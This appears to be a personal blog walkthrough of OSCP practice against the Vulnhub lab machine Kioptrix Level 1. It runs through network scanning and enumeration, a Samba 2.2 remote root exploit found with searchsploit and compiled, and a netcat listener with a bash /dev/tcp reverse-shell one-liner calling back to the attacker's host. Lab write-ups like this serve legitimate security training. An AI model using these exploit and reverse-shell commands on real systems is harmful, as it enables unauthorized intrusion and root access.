OSCP practice: Vulnhub – Kioptrix Level 1

My OSCP exam is fast approaching. For extra practice I am going to start working through the relevant vulnhub machines.

A list of vulnhub machines that are more like OSCP here.

Starting right at the beginning with: Kioptrix Level 1

I used the free vmware workstation edition and created a new private network. I moved my Kali machine and Kioptrix into that network. (I also have a basic DHCP/DNS server in there).

Starting with a scan to find the machine:

netdiscover -r 10.0.0.0/24

Nmap scan of our discovered target:

nmap -p- -sV -sS -T4 -A 10.0.0.51

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
1024/tcp open  status      1 (RPC #100024)

We seem to have:
Open SSH 2.9
HTTP & HTTPS
RPC & SMB (via Samba)

Starting a quick scan of the HTTP and SMB ports via dirb and enum4linux to build out the list of possible attack surfaces:

enum4linux 10.0.0.51

The most interesting thing in the scan is the version of Samba.

The latest on the Samba site is 4.7.0. The version on this server is 2.2.1a which looks really old. Looking at the Samba site, this version was from 2001 and was designed with Windows 2000 enhancements in mind.

dirb http://10.0.0.51

Quick manual check of the interesting pages:


At this point we have a handful of attack surfaces to explore:

  • Old Samba (2.2.1)
  • Old’ish Apache (Apache httpd 1.3.20)
  • Webalizer 2.01

The really old samba is particularly interesting, starting there:

searchsploit samba 2.2

Remote root exploit sounds perfect, inspecting the code to see if there is manual work to do. It seems to be ready to do.

Compiled with: gcc 10.c -o sambaexploit

Execute with: ./sambaexploit -b 0 -v 10.0.0.51

It seems to have worked. We dont have an interactive shell (tried an ls command), but we appear to be able to execute commands.

Set up a local listener: nc -nlvp 443

Execute reverse shell via the exploit prompt: bash -i >& /dev/tcp/10.0.0.50/443 0>&1

Success – interactive reverse shell (as root):